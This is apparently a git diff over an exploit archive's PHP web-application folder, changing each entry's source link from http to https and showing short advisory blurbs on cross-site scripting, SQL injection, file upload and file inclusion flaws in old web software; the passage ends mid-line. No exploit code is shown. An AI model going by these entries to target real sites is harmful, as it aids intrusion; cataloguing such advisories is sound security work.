-source: http://www.securityfocus.com/bid/11890/info +source: https://www.securityfocus.com/bid/11890/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24821.txt b/exploits/php/webapps/24821.txt index 420f909b8..78cf85887 100644 --- a/exploits/php/webapps/24821.txt +++ b/exploits/php/webapps/24821.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11891/info +source: https://www.securityfocus.com/bid/11891/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24822.txt b/exploits/php/webapps/24822.txt index 1586ea139..e7c9a4501 100644 --- a/exploits/php/webapps/24822.txt +++ b/exploits/php/webapps/24822.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11894/info +source: https://www.securityfocus.com/bid/11894/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24823.txt b/exploits/php/webapps/24823.txt index fa79e3f25..7f34c41eb 100644 --- a/exploits/php/webapps/24823.txt +++ b/exploits/php/webapps/24823.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11896/info +source: https://www.securityfocus.com/bid/11896/info Multiple remote vulnerabilities are reported to exist in SugarSales. diff --git a/exploits/php/webapps/24824.txt b/exploits/php/webapps/24824.txt index 91ec76b07..1c4dbd998 100644 --- a/exploits/php/webapps/24824.txt +++ b/exploits/php/webapps/24824.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11900/info +source: https://www.securityfocus.com/bid/11900/info It is reported that UBB.threads is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input prior to including it in dynamically generated web pages. diff --git a/exploits/php/webapps/24825.txt b/exploits/php/webapps/24825.txt index 664af48af..c568b4e73 100644 --- a/exploits/php/webapps/24825.txt +++ b/exploits/php/webapps/24825.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11900/info +source: https://www.securityfocus.com/bid/11900/info It is reported that UBB.threads is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input prior to including it in dynamically generated web pages. diff --git a/exploits/php/webapps/24826.txt b/exploits/php/webapps/24826.txt index 1fbe69378..66e057148 100644 --- a/exploits/php/webapps/24826.txt +++ b/exploits/php/webapps/24826.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11900/info +source: https://www.securityfocus.com/bid/11900/info It is reported that UBB.threads is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input prior to including it in dynamically generated web pages. diff --git a/exploits/php/webapps/24827.txt b/exploits/php/webapps/24827.txt index a0ef32329..b75baf455 100644 --- a/exploits/php/webapps/24827.txt +++ b/exploits/php/webapps/24827.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11900/info +source: https://www.securityfocus.com/bid/11900/info It is reported that UBB.threads is affected by multiple cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input prior to including it in dynamically generated web pages. diff --git a/exploits/php/webapps/24829.txt b/exploits/php/webapps/24829.txt index 90463bbcf..1baf4e9a4 100644 --- a/exploits/php/webapps/24829.txt +++ b/exploits/php/webapps/24829.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11903/info +source: https://www.securityfocus.com/bid/11903/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24830.txt b/exploits/php/webapps/24830.txt index 7fc437989..0e5a3e696 100644 --- a/exploits/php/webapps/24830.txt +++ b/exploits/php/webapps/24830.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11904/info +source: https://www.securityfocus.com/bid/11904/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24831.txt b/exploits/php/webapps/24831.txt index 9549694e7..fb8668b4f 100644 --- a/exploits/php/webapps/24831.txt +++ b/exploits/php/webapps/24831.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11905/info +source: https://www.securityfocus.com/bid/11905/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24832.txt b/exploits/php/webapps/24832.txt index e61102152..f25ab6bf0 100644 --- a/exploits/php/webapps/24832.txt +++ b/exploits/php/webapps/24832.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11906/info +source: https://www.securityfocus.com/bid/11906/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24834.txt b/exploits/php/webapps/24834.txt index 2d920c83e..c41c78bdc 100644 --- a/exploits/php/webapps/24834.txt +++ b/exploits/php/webapps/24834.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11907/info +source: https://www.securityfocus.com/bid/11907/info It is reported that PhpGedView is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/24835.txt b/exploits/php/webapps/24835.txt index c1590f538..25c96c70a 100644 --- a/exploits/php/webapps/24835.txt +++ b/exploits/php/webapps/24835.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11910/info +source: https://www.securityfocus.com/bid/11910/info It is reported that PhpGedView is susceptible to a remote SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to including it in an SQL query. diff --git a/exploits/php/webapps/24837.txt b/exploits/php/webapps/24837.txt index 18fb442e0..95115ae6e 100644 --- a/exploits/php/webapps/24837.txt +++ b/exploits/php/webapps/24837.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11925/info +source: https://www.securityfocus.com/bid/11925/info It is reported that PhpGedView is susceptible to a remote SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input prior to including it in an SQL query. diff --git a/exploits/php/webapps/24842.txt b/exploits/php/webapps/24842.txt index e6dbddb39..b933ac3cf 100644 --- a/exploits/php/webapps/24842.txt +++ b/exploits/php/webapps/24842.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11946/info +source: https://www.securityfocus.com/bid/11946/info iWebNegar is reported prone to multiple SQL injection vulnerabilities, these issues exist due to a lack of sufficient boundary checks performed on user-supplied URI parameter data. diff --git a/exploits/php/webapps/24844.txt b/exploits/php/webapps/24844.txt index 9a2021de8..6d5a9c9f7 100644 --- a/exploits/php/webapps/24844.txt +++ b/exploits/php/webapps/24844.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11952/info +source: https://www.securityfocus.com/bid/11952/info Reportedly PHPGroupWare contains multiple input validation vulnerabilities; it is prone to multiple SQL injection and cross-site scripting issues. These issues are all due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/24845.txt b/exploits/php/webapps/24845.txt index 92863188e..63bdc76d8 100644 --- a/exploits/php/webapps/24845.txt +++ b/exploits/php/webapps/24845.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11952/info +source: https://www.securityfocus.com/bid/11952/info Reportedly PHPGroupWare contains multiple input validation vulnerabilities; it is prone to multiple SQL injection and cross-site scripting issues. These issues are all due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/24846.txt b/exploits/php/webapps/24846.txt index 251e38a0b..5d2b9f95c 100644 --- a/exploits/php/webapps/24846.txt +++ b/exploits/php/webapps/24846.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11952/info +source: https://www.securityfocus.com/bid/11952/info Reportedly PHPGroupWare contains multiple input validation vulnerabilities; it is prone to multiple SQL injection and cross-site scripting issues. These issues are all due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/24847.txt b/exploits/php/webapps/24847.txt index a07d78467..aa5198aba 100644 --- a/exploits/php/webapps/24847.txt +++ b/exploits/php/webapps/24847.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11952/info +source: https://www.securityfocus.com/bid/11952/info Reportedly PHPGroupWare contains multiple input validation vulnerabilities; it is prone to multiple SQL injection and cross-site scripting issues. These issues are all due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/24987.txt b/exploits/php/webapps/24987.txt index b59bb9b65..b2d8f1234 100644 --- a/exploits/php/webapps/24987.txt +++ b/exploits/php/webapps/24987.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11983/info +source: https://www.securityfocus.com/bid/11983/info JSBoard is reported prone to a vulnerability that can allow a remote attacker to upload arbitrary PHP scripts to a vulnerable server. This issue results from insufficient sanitization of user-supplied input. diff --git a/exploits/php/webapps/24988.txt b/exploits/php/webapps/24988.txt index cd1fa87d3..b918ec735 100644 --- a/exploits/php/webapps/24988.txt +++ b/exploits/php/webapps/24988.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11984/info +source: https://www.securityfocus.com/bid/11984/info Wordpress is reported vulnerable to multiple cross-site scripting, HTML injection, and SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied data. diff --git a/exploits/php/webapps/24989.txt b/exploits/php/webapps/24989.txt index 403087c1c..6995b6681 100644 --- a/exploits/php/webapps/24989.txt +++ b/exploits/php/webapps/24989.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11984/info +source: https://www.securityfocus.com/bid/11984/info Wordpress is reported vulnerable to multiple cross-site scripting, HTML injection, and SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied data. diff --git a/exploits/php/webapps/24990.txt b/exploits/php/webapps/24990.txt index c8bd23f6d..1f3276edd 100644 --- a/exploits/php/webapps/24990.txt +++ b/exploits/php/webapps/24990.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11984/info +source: https://www.securityfocus.com/bid/11984/info Wordpress is reported vulnerable to multiple cross-site scripting, HTML injection, and SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied data. diff --git a/exploits/php/webapps/24991.txt b/exploits/php/webapps/24991.txt index 0de27976b..4000f6b0c 100644 --- a/exploits/php/webapps/24991.txt +++ b/exploits/php/webapps/24991.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11984/info +source: https://www.securityfocus.com/bid/11984/info Wordpress is reported vulnerable to multiple cross-site scripting, HTML injection, and SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied data. diff --git a/exploits/php/webapps/24992.txt b/exploits/php/webapps/24992.txt index 32e69b9b2..71b5e5f35 100644 --- a/exploits/php/webapps/24992.txt +++ b/exploits/php/webapps/24992.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11984/info +source: https://www.securityfocus.com/bid/11984/info Wordpress is reported vulnerable to multiple cross-site scripting, HTML injection, and SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied data. diff --git a/exploits/php/webapps/24993.txt b/exploits/php/webapps/24993.txt index 01fdb6231..7741b5e8f 100644 --- a/exploits/php/webapps/24993.txt +++ b/exploits/php/webapps/24993.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11984/info +source: https://www.securityfocus.com/bid/11984/info Wordpress is reported vulnerable to multiple cross-site scripting, HTML injection, and SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied data. diff --git a/exploits/php/webapps/24994.txt b/exploits/php/webapps/24994.txt index 9eeeab59c..571845b41 100644 --- a/exploits/php/webapps/24994.txt +++ b/exploits/php/webapps/24994.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11985/info +source: https://www.securityfocus.com/bid/11985/info MediaWiki is reported prone to a vulnerability that can allow a remote attacker to upload arbitrary PHP scripts to a vulnerable server. This issue results from insufficient sanitization of user-supplied input. diff --git a/exploits/php/webapps/25014.txt b/exploits/php/webapps/25014.txt index 3a8fd8588..6a6d0f59c 100644 --- a/exploits/php/webapps/25014.txt +++ b/exploits/php/webapps/25014.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12009/info +source: https://www.securityfocus.com/bid/12009/info It is reported that WorkBoard is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/25037.txt b/exploits/php/webapps/25037.txt index 6680e9d4a..b8fd7309b 100644 --- a/exploits/php/webapps/25037.txt +++ b/exploits/php/webapps/25037.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12037/info +source: https://www.securityfocus.com/bid/12037/info Kayako eSupport is prone to multiple input validation vulnerabilities. One cross-site scripting and six SQL injection vulnerabilities. diff --git a/exploits/php/webapps/25038.txt b/exploits/php/webapps/25038.txt index 895b9ba0c..350a99c3b 100644 --- a/exploits/php/webapps/25038.txt +++ b/exploits/php/webapps/25038.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12037/info +source: https://www.securityfocus.com/bid/12037/info Kayako eSupport is prone to multiple input validation vulnerabilities. One cross-site scripting and six SQL injection vulnerabilities. diff --git a/exploits/php/webapps/25043.txt b/exploits/php/webapps/25043.txt index cd4bb5814..9fbef4610 100644 --- a/exploits/php/webapps/25043.txt +++ b/exploits/php/webapps/25043.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12074/info +source: https://www.securityfocus.com/bid/12074/info phpGroupWare is prone to a remote file include vulnerability, potentially allowing the execution of malicious PHP code. This would occur in the context of the affected web server. diff --git a/exploits/php/webapps/25044.txt b/exploits/php/webapps/25044.txt index cca49c560..2935e44be 100644 --- a/exploits/php/webapps/25044.txt +++ b/exploits/php/webapps/25044.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12082/info +source: https://www.securityfocus.com/bid/12082/info PhpGroupWare is reported to be susceptible to a HTML injection vulnerability. This issue exists because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25045.txt b/exploits/php/webapps/25045.txt index 248eca71a..6bb169193 100644 --- a/exploits/php/webapps/25045.txt +++ b/exploits/php/webapps/25045.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12083/info +source: https://www.securityfocus.com/bid/12083/info A remote SQL injection vulnerability reportedly affects 2Bgal. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in an SQL query. diff --git a/exploits/php/webapps/25052.pl b/exploits/php/webapps/25052.pl index a7ea6aca3..cc37ea367 100755 --- a/exploits/php/webapps/25052.pl +++ b/exploits/php/webapps/25052.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12304/info +source: https://www.securityfocus.com/bid/12304/info Siteman is reported prone to a vulnerability that may allow users to gain elevated privileges. This issue results from insufficient sanitization of user-supplied data. diff --git a/exploits/php/webapps/25053.html b/exploits/php/webapps/25053.html index a75a06e8e..9154a2bd4 100644 --- a/exploits/php/webapps/25053.html +++ b/exploits/php/webapps/25053.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12304/info +source: https://www.securityfocus.com/bid/12304/info Siteman is reported prone to a vulnerability that may allow users to gain elevated privileges. This issue results from insufficient sanitization of user-supplied data. diff --git a/exploits/php/webapps/25058.txt b/exploits/php/webapps/25058.txt index 36eec0c58..469a1e1b4 100644 --- a/exploits/php/webapps/25058.txt +++ b/exploits/php/webapps/25058.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12358/info +source: https://www.securityfocus.com/bid/12358/info Exponent is reported prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/25059.txt b/exploits/php/webapps/25059.txt index cd9567e8a..55c8d9762 100644 --- a/exploits/php/webapps/25059.txt +++ b/exploits/php/webapps/25059.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12359/info +source: https://www.securityfocus.com/bid/12359/info Multiple input validation vulnerabilities affect MercuryBoard. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it in critical functionality. diff --git a/exploits/php/webapps/25062.txt b/exploits/php/webapps/25062.txt index b741507d0..922ca18b9 100644 --- a/exploits/php/webapps/25062.txt +++ b/exploits/php/webapps/25062.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12382/info +source: https://www.securityfocus.com/bid/12382/info Comdev eCommerce is reported prone to multiple cross-site scripting vulnerabilities. These may facilitate theft of cookie-based authentication credentials as well as other attacks. diff --git a/exploits/php/webapps/25064.txt b/exploits/php/webapps/25064.txt index 926a3ebd7..bb30878fa 100644 --- a/exploits/php/webapps/25064.txt +++ b/exploits/php/webapps/25064.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12388/info +source: https://www.securityfocus.com/bid/12388/info Magic Winmail Server is reportedly affected by multiple vulnerabilities. diff --git a/exploits/php/webapps/25065.txt b/exploits/php/webapps/25065.txt index 8d6fc237f..10dc98491 100644 --- a/exploits/php/webapps/25065.txt +++ b/exploits/php/webapps/25065.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12388/info +source: https://www.securityfocus.com/bid/12388/info Magic Winmail Server is reportedly affected by multiple vulnerabilities. diff --git a/exploits/php/webapps/25068.txt b/exploits/php/webapps/25068.txt index 33a828970..233d3b4bb 100644 --- a/exploits/php/webapps/25068.txt +++ b/exploits/php/webapps/25068.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12396/info +source: https://www.securityfocus.com/bid/12396/info Multiple remote vulnerabilities reportedly affect IceWarp Web Mail. The underlying issues are due to input and access validation errors. diff --git a/exploits/php/webapps/25069.txt b/exploits/php/webapps/25069.txt index 61412455d..cac40feac 100644 --- a/exploits/php/webapps/25069.txt +++ b/exploits/php/webapps/25069.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12396/info +source: https://www.securityfocus.com/bid/12396/info Multiple remote vulnerabilities reportedly affect IceWarp Web Mail. The underlying issues are due to input and access validation errors. diff --git a/exploits/php/webapps/25071.txt b/exploits/php/webapps/25071.txt index 126afc63b..5174fd3f2 100644 --- a/exploits/php/webapps/25071.txt +++ b/exploits/php/webapps/25071.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12399/info +source: https://www.securityfocus.com/bid/12399/info Infinite Mobile Delivery Webmail is reportedly affected by a path disclosure vulnerability. This issue could permit a malicious user to expose the root path of the affected application. diff --git a/exploits/php/webapps/25074.txt b/exploits/php/webapps/25074.txt index aea6960b9..4dc4cccf1 100644 --- a/exploits/php/webapps/25074.txt +++ b/exploits/php/webapps/25074.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12406/info +source: https://www.securityfocus.com/bid/12406/info Xoops Incontent module is reported prone to a directory traversal vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25089.txt b/exploits/php/webapps/25089.txt index 0df94baf6..edb70d20f 100644 --- a/exploits/php/webapps/25089.txt +++ b/exploits/php/webapps/25089.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12482/info +source: https://www.securityfocus.com/bid/12482/info PHP-Fusion is reportedly affected by an information disclosure vulnerability. This issue is due to the application failing to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25090.txt b/exploits/php/webapps/25090.txt index 7de492192..6356d152e 100644 --- a/exploits/php/webapps/25090.txt +++ b/exploits/php/webapps/25090.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12489/info +source: https://www.securityfocus.com/bid/12489/info xGB is reportedly affected by a vulnerability that could permit unauthorized administrator access. This issue is due to the application failing to properly verify user credentials. diff --git a/exploits/php/webapps/25093.txt b/exploits/php/webapps/25093.txt index 7cc463921..6e35e4da0 100644 --- a/exploits/php/webapps/25093.txt +++ b/exploits/php/webapps/25093.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12503/info +source: https://www.securityfocus.com/bid/12503/info MercuryBoard is affected by an SQL injection vulnerability. This issue is due to the application failing to properly sanitize user-supplied input before being used in SQL queries. diff --git a/exploits/php/webapps/25097.txt b/exploits/php/webapps/25097.txt index 3cdba76a1..b6b5ee27f 100644 --- a/exploits/php/webapps/25097.txt +++ b/exploits/php/webapps/25097.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12549/info +source: https://www.securityfocus.com/bid/12549/info Brooky CubeCart is reported prone to multiple vulnerabilities. These issues result from insufficient sanitization of user-supplied data and may allow remote attackers to disclose arbitrary files and carry out cross-site scripting attacks. diff --git a/exploits/php/webapps/25098.txt b/exploits/php/webapps/25098.txt index a4494eda4..87f3f24d0 100644 --- a/exploits/php/webapps/25098.txt +++ b/exploits/php/webapps/25098.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12549/info +source: https://www.securityfocus.com/bid/12549/info Brooky CubeCart is reported prone to multiple vulnerabilities. These issues result from insufficient sanitization of user-supplied data and may allow remote attackers to disclose arbitrary files and carry out cross-site scripting attacks. diff --git a/exploits/php/webapps/25099.txt b/exploits/php/webapps/25099.txt index 60e4dbfd9..1e38818f9 100644 --- a/exploits/php/webapps/25099.txt +++ b/exploits/php/webapps/25099.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12557/info +source: https://www.securityfocus.com/bid/12557/info CitrusDB is reportedly affected by an access validation vulnerability during the upload of CSV files. Exploitation of this issue could result in path disclosure or SQL injection. The issue exists because the application fails to verify user credentials during file upload and import. diff --git a/exploits/php/webapps/25100.txt b/exploits/php/webapps/25100.txt index 2664460b5..a369b39f5 100644 --- a/exploits/php/webapps/25100.txt +++ b/exploits/php/webapps/25100.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12557/info +source: https://www.securityfocus.com/bid/12557/info CitrusDB is reportedly affected by an access validation vulnerability during the upload of CSV files. Exploitation of this issue could result in path disclosure or SQL injection. The issue exists because the application fails to verify user credentials during file upload and import. diff --git a/exploits/php/webapps/25101.txt b/exploits/php/webapps/25101.txt index 4455a636d..baab34b12 100644 --- a/exploits/php/webapps/25101.txt +++ b/exploits/php/webapps/25101.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12557/info +source: https://www.securityfocus.com/bid/12557/info CitrusDB is reportedly affected by an access validation vulnerability during the upload of CSV files. Exploitation of this issue could result in path disclosure or SQL injection. The issue exists because the application fails to verify user credentials during file upload and import. diff --git a/exploits/php/webapps/25102.txt b/exploits/php/webapps/25102.txt index eec0348b6..63815f86f 100644 --- a/exploits/php/webapps/25102.txt +++ b/exploits/php/webapps/25102.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12560/info +source: https://www.securityfocus.com/bid/12560/info CitrusDB is reportedly affected by an authentication bypass vulnerability. This issue is due to the application using a static value during the creation of user cookie information. diff --git a/exploits/php/webapps/25103.txt b/exploits/php/webapps/25103.txt index 2461c151c..ae6b42f72 100644 --- a/exploits/php/webapps/25103.txt +++ b/exploits/php/webapps/25103.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12561/info +source: https://www.securityfocus.com/bid/12561/info It is reported that PHP-Nuke is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/25104.txt b/exploits/php/webapps/25104.txt index 054e2c3ec..fedc6c88f 100644 --- a/exploits/php/webapps/25104.txt +++ b/exploits/php/webapps/25104.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12564/info +source: https://www.securityfocus.com/bid/12564/info CitrusDB is reportedly affected by a vulnerability that permits the inclusion of any local PHP file. This issue is due to the application failing to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25105.txt b/exploits/php/webapps/25105.txt index 08f77c027..bdd605914 100644 --- a/exploits/php/webapps/25105.txt +++ b/exploits/php/webapps/25105.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12568/info +source: https://www.securityfocus.com/bid/12568/info A vulnerability is reported to exist in osCommerce that may allow a remote user to launch cross-site scripting attacks. diff --git a/exploits/php/webapps/25109.txt b/exploits/php/webapps/25109.txt index 788817a71..daeec579d 100644 --- a/exploits/php/webapps/25109.txt +++ b/exploits/php/webapps/25109.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12573/info +source: https://www.securityfocus.com/bid/12573/info DCP-Portal is reportedly affected by multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25111.txt b/exploits/php/webapps/25111.txt index 587c52092..18f5105d5 100644 --- a/exploits/php/webapps/25111.txt +++ b/exploits/php/webapps/25111.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12576/info +source: https://www.securityfocus.com/bid/12576/info PaNews is reportedly affected by a cross-site scripting vulnerability. This issue exists because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25112.txt b/exploits/php/webapps/25112.txt index c803e63ce..277123cbc 100644 --- a/exploits/php/webapps/25112.txt +++ b/exploits/php/webapps/25112.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12578/info +source: https://www.securityfocus.com/bid/12578/info A remote cross-site scripting vulnerability affects the 'forum.php' script of MercuryBoard. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/php/webapps/25113.txt b/exploits/php/webapps/25113.txt index 3a6ec7f73..e1f0ef545 100644 --- a/exploits/php/webapps/25113.txt +++ b/exploits/php/webapps/25113.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12581/info +source: https://www.securityfocus.com/bid/12581/info WebCalendar is affected by an SQL injection vulnerability. This issue exists because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25114.txt b/exploits/php/webapps/25114.txt index 7e842168c..2a3eb8be3 100644 --- a/exploits/php/webapps/25114.txt +++ b/exploits/php/webapps/25114.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12582/info +source: https://www.securityfocus.com/bid/12582/info paFaq is reportedly affected by an SQL injection vulnerability. This issue exists because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25115.txt b/exploits/php/webapps/25115.txt index 9bdc0b06c..8c34c9590 100644 --- a/exploits/php/webapps/25115.txt +++ b/exploits/php/webapps/25115.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12582/info +source: https://www.securityfocus.com/bid/12582/info paFaq is reportedly affected by an SQL injection vulnerability. This issue exists because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25116.txt b/exploits/php/webapps/25116.txt index f9ef0b0c5..ae18f779b 100644 --- a/exploits/php/webapps/25116.txt +++ b/exploits/php/webapps/25116.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12582/info +source: https://www.securityfocus.com/bid/12582/info paFaq is reportedly affected by an SQL injection vulnerability. This issue exists because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25117.txt b/exploits/php/webapps/25117.txt index eba48329d..749b11609 100644 --- a/exploits/php/webapps/25117.txt +++ b/exploits/php/webapps/25117.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12582/info +source: https://www.securityfocus.com/bid/12582/info paFaq is reportedly affected by an SQL injection vulnerability. This issue exists because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25118.txt b/exploits/php/webapps/25118.txt index c2bb5517b..0e8ab9522 100644 --- a/exploits/php/webapps/25118.txt +++ b/exploits/php/webapps/25118.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12583/info +source: https://www.securityfocus.com/bid/12583/info BibORB is reported prone to multiple vulnerabilities arising from insufficient sanitization of user-supplied input. These issues can be exploited by a remote attacker to carry out cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload attacks. diff --git a/exploits/php/webapps/25119.txt b/exploits/php/webapps/25119.txt index d5f8e4385..672159089 100644 --- a/exploits/php/webapps/25119.txt +++ b/exploits/php/webapps/25119.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12583/info +source: https://www.securityfocus.com/bid/12583/info BibORB is reported prone to multiple vulnerabilities arising from insufficient sanitization of user-supplied input. These issues can be exploited by a remote attacker to carry out cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload attacks. diff --git a/exploits/php/webapps/25120.txt b/exploits/php/webapps/25120.txt index 2941d7d4e..0f362fbed 100644 --- a/exploits/php/webapps/25120.txt +++ b/exploits/php/webapps/25120.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12583/info +source: https://www.securityfocus.com/bid/12583/info BibORB is reported prone to multiple vulnerabilities arising from insufficient sanitization of user-supplied input. These issues can be exploited by a remote attacker to carry out cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload attacks. diff --git a/exploits/php/webapps/25121.txt b/exploits/php/webapps/25121.txt index e5ba75849..0ec01f14e 100644 --- a/exploits/php/webapps/25121.txt +++ b/exploits/php/webapps/25121.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12583/info +source: https://www.securityfocus.com/bid/12583/info BibORB is reported prone to multiple vulnerabilities arising from insufficient sanitization of user-supplied input. These issues can be exploited by a remote attacker to carry out cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload attacks. diff --git 